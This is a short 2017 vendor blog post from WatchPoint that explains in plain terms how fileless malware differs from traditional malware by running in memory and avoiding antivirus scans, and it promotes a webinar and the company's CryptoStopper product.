Fileless Malware Demystified

Posted by Jordan Kadlec on May 5, 2017 12:08:17 PM
Jordan Kadlec
submit to reddit

malware.jpg

In a recent webinar hosted by WatchPoint, CEO Greg Edwards and Chief Hacking Officer Nathan Studebaker explained fileless malware. Fileless malware is a tactic that we have seen professional hackers use more and more over the last six months. In fact, the last quarter of 2016 saw a 33% increase in the distribution of fileless malware.

What is Fileless Malware?

The best way to describe fileless malware is to compare it to traditional malware, which we can see below.

Traditional Malware:

  • Visit a page
  • Download a file
  • File is written to the disk
  • File is scanned by antivirus
  • Antivirus stops if malware is recognized
  • Execute file which runs and installs the malware

Fileless Malware:

  • Visit a page
  • Interact with the site
    • This can include visiting a web page, filling out a form, or clicking on a link
  • A shell is spawned
    • This is the first necessary component of fileless malware
  • Malicious code is run in RAM

What makes fileless malware so different, is that nothing ever touches your disk. Traditional malware is written to files that are on your disk which is what your antivirus is checking. So, with fileless malware, nothing is written on your disk, so there is nothing for your antivirus to scan. Thus, fileless malware bypasses the antivirus on your computer and/or server, making it easier for the infection to take place.

Fileless Malware Demystified 

The webinar has been posted to YouTube; you can check it out here. Watch our cybersecurity experts take you through a step-by-step process on the differences between traditional and fileless malware. Additionally, CEO Greg Edwards takes you through how our product – CryptoStopper – can protect you from becoming infected with fileless ransomware. Contact WatchPoint today to secure your business from being hit with ransomware of all kinds.

Topics: Fileless Malware, Malware, Fileless